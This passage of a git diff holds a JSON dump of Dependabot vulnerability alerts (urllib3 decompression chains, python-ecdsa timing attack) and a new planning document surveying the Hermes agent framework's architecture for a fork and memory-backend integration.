2.6.0","first_patched_version":{"identifier":"2.6.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/3","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/3","created_at":"2026-04-30T08:37:30Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":2,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-gm62-xv2j-4w53","cve_id":"CVE-2025-66418","summary":"urllib3 allows an unbounded number of links in the decompression chain","description":"## Impact\n\nurllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`).\n\nHowever, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data.\n\n\n## Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly.\n\n\n## Remediation\n\nUpgrade to at least urllib3 v2.6.0 in which the library limits the number of links to 5.\n\nIf upgrading is not immediately possible, use [`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) and ensure that `resp.headers[\"content-encoding\"]` contains a safe number of encodings before reading the response content.","severity":"high","identifiers":[{"value":"GHSA-gm62-xv2j-4w53","type":"GHSA"},{"value":"CVE-2025-66418","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53"},{"url":"https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66418"},{"url":"https://github.com/advisories/GHSA-gm62-xv2j-4w53"}],"published_at":"2025-12-05T18:15:19Z","updated_at":"2025-12-05T18:33:00Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.24, < 2.6.0","first_patched_version":{"identifier":"2.6.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00016,"percentile":0.03574},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.24, < 2.6.0","first_patched_version":{"identifier":"2.6.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/2","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/2","created_at":"2026-04-30T08:37:30Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":1,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"ecdsa"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-wj6h-64fc-37mp","cve_id":"CVE-2024-23342","summary":"Minerva timing attack on P-256 in python-ecdsa","description":"python-ecdsa has been found to be subject to a Minerva timing attack on the P-256 curve. Using the `ecdsa.SigningKey.sign_digest()` API function and timing signatures an attacker can leak the internal nonce which may allow for private key discovery. Both ECDSA signatures, key generation, and ECDH operations are affected. ECDSA signature verification is unaffected. The python-ecdsa project considers side channel attacks out of scope for the project and there is no planned fix.","severity":"high","identifiers":[{"value":"GHSA-wj6h-64fc-37mp","type":"GHSA"},{"value":"CVE-2024-23342","type":"CVE"}],"references":[{"url":"https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-wj6h-64fc-37mp"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/blob/master/SECURITY.md"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-23342"},{"url":"https://minerva.crocs.fi.muni.cz"},{"url":"https://securitypitfalls.wordpress.com/2018/08/03/constant-time-compare-in-python"},{"url":"https://github.com/advisories/GHSA-wj6h-64fc-37mp"}],"published_at":"2024-01-22T21:35:27Z","updated_at":"2025-07-30T18:17:41Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"high","vulnerable_version_range":">= 0","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","score":7.4},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00622,"percentile":0.69689},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","score":7.4},"cwes":[{"cwe_id":"CWE-203","name":"Observable Discrepancy"},{"cwe_id":"CWE-208","name":"Observable Timing Discrepancy"},{"cwe_id":"CWE-385","name":"Covert Timing Channel"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"high","vulnerable_version_range":">= 0","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/1","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/1","created_at":"2026-04-30T08:37:30Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null}]
\ No newline at end of file
diff --git a/.planning/hermes-recon/architecture.md b/.planning/hermes-recon/architecture.md
new file mode 100644
index 00000000..0d1482f1
--- /dev/null
+++ b/.planning/hermes-recon/architecture.md
@@ -0,0 +1,207 @@
+# Hermes Agent Architecture Recon
+
+**Source**: `NousResearch/hermes-agent` (147k ★, MIT)
+**Clone**: `/tmp/hermes-recon` (depth=1, 2026-05-13T06:58Z)
+**Version**: HEAD as of 2026-05-13
+**Repo size**: ~100MB (shallow clone)
+
+## Architecture Overview
+
+Hermes is a Python agent framework with a plugin system, tool registry,
+multi-provider model backend, and 20+ messaging platform adapters. The
+core agent loop (`run_agent.py`) is ~12K lines; the CLI (`cli.py`) is
+~615K lines. Total Python surface is massive — a full Rust rewrite of
+the runtime (per 邓Sir's plan) is a major undertaking.
+
+```
+┌─────────────────────────────────────────────┐
+│ Entry Points │
+│ cli.py (TUI) run_agent.py (headless) │
+│ batch_runner.py rl_cli.py mcp_serve.py │
+├─────────────────────────────────────────────┤
+│ Core Agent Loop │
+│ AIAgent class (run_agent.py, ~12K LOC) │
+│ - Prompt construction │
+│ - Model provider dispatch │
+│ - Tool call parsing + execution │
+│ - Compression (trajectory_compressor.py) │
+├─────────────────────────────────────────────┤
+│ Tool System │
+│ tools/registry.py → ToolEntry │
+│ model_tools.py → handle_function_call() │
+│ 80+ tool files auto-discovered │
+├──────────────┬──────────────────────────────┤
+│ Plugins │ Environments │
+│ memory (8) │ local, docker, ssh, │
+│ models (6+) │ modal, daytona, │
+│ context_eng │ singularity │
+│ kanban │ │
+│ observability│ │
+└──────────────┴──────────────────────────────┘
+```
+
+## Key Components
+
+### 1. Tool Dispatch Interface
+
+**File**: `tools/registry.py:ToolEntry`
+
+```python
+class ToolEntry:
+ __slots__ = (
+ "name", "toolset", "schema", "handler", "check_fn",
+ "requires_env", "is_async", "description", "emoji",
+ "max_result_size_chars", "dynamic_schema_overrides",
+ )
+```
+
+Tool files call `registry.register()` at module level. `discover_builtin_tools()`
+uses AST parsing to find modules with register calls, then imports them lazily.
+This is a **self-registering pattern** — no central tool list, no manual sync.
+
+Evercore integration seam: The registry is the natural injection point. An
+Evercore tool adapter would register tools that proxy through Evercore's API
+layer instead of calling local handler functions.
+
+### 2. Memory Abstraction
+
+**File**: `plugins/memory/__init__.py`
+
+Memory providers implement a `MemoryProvider` ABC. Eight implementations ship:
+
+| Provider | File | Description |
+|----------|------|-------------|
+| honcho | `plugins/memory/honcho/` | Conversation memory |
+| mem0 | `plugins/memory/mem0/` | mem0ai integration |
+| supermemory | `plugins/memory/supermemory/` | Supermemory vector DB |
+| retaindb | `plugins/memory/retaindb/` | RetainDB |
+| openviking | `plugins/memory/openviking/` | OpenViking |
+| byterover | `plugins/memory/byterover/` | ByteRover |
+| hindsight | `plugins/memory/hindsight/` | Hindsight |
+| holographic | `plugins/memory/holographic/` | Holographic memory |
+
+Only ONE provider active at a time, selected via `config.yaml` → `memory.provider`.
+Providers are discovered by scanning for `register_memory_provider` or
+`MemoryProvider` in `__init__.py` source.
+
+**Evercore integration seam**: Replace the MemoryProvider ABC with an Evercore
+adapter. The adapter would use the same config-driven selection (`memory.provider: evercore`)
+but route all memory operations through EverCore's REST API (or direct import).
+This is 邓Sir's "abstract Memory" suggestion — keep the Hermes memory plugin
+interface but swap the backend.
+
+### 3. MCP Integration
+
+**File**: `mcp_serve.py` (~32K LOC)
+
+Hermes can run as an MCP server, exposing its tools to MCP clients (Claude
+Desktop, VS Code, etc.). The MCP server wraps Hermes's tool registry and
+exposes tool definitions via the MCP protocol.
+
+**Evercore integration seam**: EverCore could register as an MCP client that
+consumes Hermes's tool definitions, or Hermes's MCP server could be extended
+to proxy tools through Evercore's memory layer before execution.
+
+### 4. Sandbox Model
+
+**File**: `environments/`
+
+Hermes supports multiple execution backends for tool sandboxing:
+
+| Environment | Status | Description |
+|-------------|--------|-------------|
+| local | Default | Direct host execution (no sandbox) |
+| docker | Active | Containerized execution |
+| ssh | Active | Remote execution via SSH |
+| modal | Active | Modal.com serverless |
+| daytona | Active | Daytona dev environments |
+| singularity | Active | HPC containers |
+
+**Evercore integration seam**: The Rust runtime would need to implement at
+least the local + docker backends. Tauri/Burn/tokio are the prior-art
+references for sandbox primitives in Rust.
+
+### 5. Plugin System
+
+**File**: `plugins/`
+
+Plugin categories and count:
+- `memory/` (8 providers) — memory backends
+- `model-providers/` (6+) — inference backends (openrouter, anthropic, gmi, etc.)
+- `context_engine/` — context augmentation
+- `kanban/` — multi-agent board dispatcher
+- `observability/` — metrics/traces/logs
+- `image_gen/` — image generation providers
+- `platforms/` — messaging platform adapters (in `gateway/platforms/`)
+
+Plugins are discovered via filesystem scanning. User-installed plugins live
+in `$HERMES_HOME/plugins/`. Bundled plugins take precedence on name collisions.
+
+### 6. Session Store
+
+**File**: `hermes_state.py` (~127K LOC)
+
+SQLite-based session database with FTS5 full-text search. Stores conversation
+history, tool call results, and agent state. Schema includes `sessions`,
+`messages`, `tool_calls`, `tool_results`, `memories` tables.
+
+**Evercore integration seam**: Replace the SQLite session store with EverCore's
+tenant-scoped memory storage. Sessions become EverCore tenants; messages and
+tool results become memory entries.
+
+## Integration Seams Summary
+
+| Seam | Hermes Component | Evercore Counterpart | Effort |
+|------|-----------------|---------------------|--------|
+| Memory backend | `plugins/memory/` ABC | EverCore memory_manager.py | Medium |
+| Session store | `hermes_state.py` SQLite | EverCore tenant storage | High |
+| Tool registry | `tools/registry.py` | EverCore API tool adapter | Low |
+| Context engine | `plugins/context_engine/` | EverCore context retrieval | Medium |
+| Plugin discovery | Filesystem scan | Config-driven plugin loading | Low |
+| Environment sandbox | `environments/` backends | Rust sandbox (tokio/Tauri) | High |
+
+## Fork Strategy
+
+Per the May plan (project_evermind_2026_05 memory):
+1. **Fork Hermes** (MIT license, no legal barrier)
+2. **Rust rewrite of runtime** — environments, sandbox, plugin loader, CLI
+3. **Evercore kernel integration** — memory backend, session store, context engine
+4. **Keep Hermes GUI plugin** — the TUI/web interface stays as Hermes's
+ presentation layer
+5. **EverMem Bench + Evil Agent Bench** — benchmark narrative for the fork
+
+## Prior Art for Rust Runtime
+
+Per the May plan proposal:
+- **Tauri** — desktop app shell (Hermes Desktop replacement)
+- **Burn** — ML framework (model provider integration)
+- **tokio** — async runtime (agent loop, tool dispatch)
+- **candle** — inference (optional, for local model support)
+
+## Key Metrics
+
+- ~12K LOC core agent loop (`run_agent.py`)
+- ~615K LOC CLI (`cli.py`) — primarily UI code, not runtime
+- 80+ tool modules in `tools/`
+- 8 memory provider implementations
+- 20+ messaging platform adapters
+- ~17K tests across ~900 files
+
+## Files Referenced
+
+- `/tmp/hermes-recon/AGENTS.md` — project structure guide
+- `/tmp/hermes-recon/tools/registry.py` — ToolEntry definition, `discover_builtin_tools()`
+- `/tmp/hermes-recon/plugins/memory/__init__.py` — MemoryProvider ABC, provider discovery
+- `/tmp/hermes-recon/mcp_serve.py` — MCP server (~32K LOC)
+- `/tmp/hermes-recon/environments/` — sandbox backends
+- `/tmp/hermes-recon/hermes_state.py` — SQLite session store
+- `/tmp/hermes-recon/run_agent.py` — AIAgent class (~12K LOC)
+- `/tmp/hermes-recon/model_tools.py` — tool orchestration
+
+## References in Existing Codebase
+
+- `methods/EverCore/src/agentic_layer/memory_manager.py` — core memory manager
+- `methods/EverCore/src/infra_layer/adapters/input/api/` — REST API controllers
+- `methods/EverCore/docs/` — setup, usage, architecture docs
+- `benchmarks/EverMemBench/` — memory quality evaluation
+- `benchmarks/EvoAgentBench/` — agent self-evolution evaluation